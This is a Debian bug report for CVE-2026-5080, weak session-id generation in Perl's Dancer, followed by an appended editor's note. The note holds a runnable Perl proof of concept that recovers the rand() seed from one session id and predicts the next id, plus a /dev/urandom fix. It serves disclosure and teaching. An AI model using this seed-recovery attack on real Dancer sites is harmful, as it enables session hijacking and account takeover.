Bug#1135322: libdancer-perl: CVE-2026-5080
Salvatore Bonaccorso
carnil at debian.org
Fri May 1 06:59:43 BST 2026
Source: libdancer-perl
Version: 1.3522-1
Severity: important
Tags: security upstream
X-Debbugs-Cc: carnil at debian.org, Debian Security Team <team at security.debian.org>
Hi,
The following vulnerability was published for libdancer-perl.
CVE-2026-5080[0]:
| Dancer::Session::Abstract versions through 1.3522 for Perl generate
| session ids insecurely. The session id is generated from summing
| the character codepoints of the absolute pathname with the process
| id, the epoch time and calls to the built-in rand() function to
| return a number between 0 and 999-billion, and concatenating that
| result three times. The path name might be known or guessed by an
| attacker, especially for applications known to be written using
| Dancer with standard installation locations. The epoch time can be
| guessed by an attacker, and may be leaked in the HTTP header. The
| process id comes from a small set of numbers, and workers may have
| sequential process ids. The built-in rand() function is seeded with
| 32-bits and is considered unsuitable for security applications.
| Predictable session ids could allow an attacker to gain access to
| systems.
If you fix the vulnerability, please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
For further information see:
[0] https://security-tracker.debian.org/tracker/CVE-2026-5080
https://www.cve.org/CVERecord?id=CVE-2026-5080
[1] https://lists.security.metacpan.org/cve-announce/msg/39488574/
Please adjust the affected versions in the BTS as needed.
Regards,
Salvatore
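Editor's note (added to this page, not part of the bug report or of Dancer's own code): the advisory text above describes the generator in words only, so the Perl below is a reconstruction from that description, not Dancer's source. It assumes one reading of the wording (a fresh rand() draw for each of the three concatenated parts), and the path, pid, epoch and seed values are constructed for the demo. The point it makes is the one the advisory makes: three concatenated 12-digit numbers look like roughly 120 bits of id, but path, pid and time are known or guessable, so the only unpredictable input is rand(), and that is bounded by its 32-bit seed. Once an attacker who knows one id from a worker has walked the seed space, every later id that worker issues is predictable as well (assuming no other rand() calls intervene). The /dev/urandom replacement is the editor's illustration of a sound generator, not a claim about how upstream fixed the bug. The search window of about 10,000 seeds keeps the demo fast; the real space is 2**32, which is still cheap to enumerate offline.

```perl
#!/usr/bin/env perl
use strict;
use warnings;

# Model of the weak generator as the advisory describes it (reconstruction,
# not Dancer's source): sum the codepoints of the absolute path, add the pid,
# the epoch time and int(rand(1e12)), and concatenate three such numbers.
# Reading assumed here: rand() is drawn afresh for each of the three parts.
sub weak_session_id {
    my ($path, $pid, $epoch) = @_;
    my $path_sum = 0;
    $path_sum += ord($_) for split //, $path;
    return join '', map { $path_sum + $pid + $epoch + int(rand(1_000_000_000_000)) } 1 .. 3;
}

# Attacker side: knows the path (standard install location), guesses pid and
# epoch within small windows, and walks candidate seeds of the 32-bit space.
# Returns the seed that reproduces $target_id, or undef if none in range.
sub recover_seed {
    my ($target_id, $path, $pids, $epochs, $seed_lo, $seed_hi) = @_;
    for my $seed ($seed_lo .. $seed_hi) {
        for my $pid (@$pids) {
            for my $epoch (@$epochs) {
                srand($seed);    # reset the PRNG to this candidate seed
                return $seed if weak_session_id($path, $pid, $epoch) eq $target_id;
            }
        }
    }
    return;
}

# Sound alternative (editor's illustration): 256 bits straight from the
# kernel CSPRNG. Mixing in path, pid or time adds structure, not entropy.
sub strong_session_id {
    open my $fh, '<:raw', '/dev/urandom' or die "open /dev/urandom: $!";
    my $got = read $fh, my $buf, 32;
    close $fh;
    die "short read from /dev/urandom" unless defined $got && $got == 32;
    return unpack 'H*', $buf;
}

# --- Demo with constructed values ---
my $path        = '/var/www/myapp/bin/app.pl';  # assumed typical install path
my $pid         = 4242;                         # constructed worker pid
my $epoch       = 1777615183;                   # constructed request time
my $secret_seed = 123_456_789;                  # stands in for perl's 32-bit auto-seed

srand($secret_seed);
my $victim_id = weak_session_id($path, $pid, $epoch);
my $next_id   = weak_session_id($path, $pid, $epoch + 1);   # next session this worker issues
print "victim id: $victim_id\n";

my $found = recover_seed(
    $victim_id, $path,
    [ $pid - 2 .. $pid + 2 ],         # workers tend to have nearby pids
    [ $epoch - 2 .. $epoch + 2 ],     # time guessed from a Date: header
    $secret_seed - 5000, $secret_seed + 5000,   # demo window; real space is 2**32
);
die "seed not in window\n" unless defined $found;
print "recovered seed: $found\n";

# With the seed known, replay the PRNG: consume the victim's three draws,
# and the following three draws are the next id this worker will hand out
# (assumes no other rand() calls happen in between).
srand($found);
weak_session_id($path, $pid, $epoch);
my $predicted = weak_session_id($path, $pid, $epoch + 1);
print "predicted next id matches: ", ($predicted eq $next_id ? "yes" : "no"), "\n";

print "strong id: ", strong_session_id(), "\n";
```

Run it with a stock perl; it needs no modules beyond core. The search is additive in pid and epoch, so a wrong guess for either only shifts the digits rather than hiding the seed, which is why narrow windows around the guessed values suffice.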